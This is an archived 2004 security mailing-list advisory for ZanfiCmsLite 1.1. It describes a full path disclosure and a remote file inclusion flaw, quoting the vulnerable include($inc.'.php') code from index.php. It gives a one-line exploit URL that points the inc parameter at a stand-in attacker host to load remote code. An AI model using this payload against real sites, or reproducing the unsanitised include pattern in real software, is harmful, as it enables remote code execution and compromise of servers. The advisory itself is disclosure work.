|
Neohapsis is currently accepting applications for employment. For more information, please visit our website www.neohapsis.com or email hr@neohapsis.com |
Multiple vulnerabilities in ZanfiCmsLite
From: Lin Xiaofeng (Cracklove
Gmail.Com)
Date: Mon Oct 11 2004 - 07:59:48 CDT
- Messages sorted by: [ date ] [ thread ] [ subject ] [ author ]
**********************************
*AuThor:Cracklove *
*emA!l:Cracklove[at]Gmail[dot]Com*
*HoMePaGe:http://ProxySky.com *
**********************************
[Info]
Website: http://www.zanfi.nl
Version: 1.1,The Newest Version
Problem: Full path disclosure,Include file
[Vuls]
1.Full path disclosure:
Let's try to request like this:
http://localhost/cms/adm_pages.php
and we get standard error messages like that:
Warning: mysql_query(): supplied argument is not a valid MySQL-Link resource in c:\appserv\www\cms\adm_pages.php on line 2
No blocks in the table
The Problem also in corr_pages.php,del_block.php,del_page.php,footer.php,home.php etc.
2.Include file
Ok let's open ./index.php,We see
if (!isset($inc)):
include ("home.php");
else:
include ($inc.".php");
endif;
O Yeah!See u Again Include Vul!
[Exploit]
http://target/index.php?inc=http://[Attacker]
[Fix]
Vuls has been reported to autuor,No reply yet.
[Greetings]
Greets To Lcx,Fatb,Envymask,S4T,ITS,CHT,WDYL,~The WhackerZ~ TeAm.
http://www.proxysky.com/vulz/show.php?id=3
- Messages sorted by: [ date ] [ thread ] [ subject ] [ author ]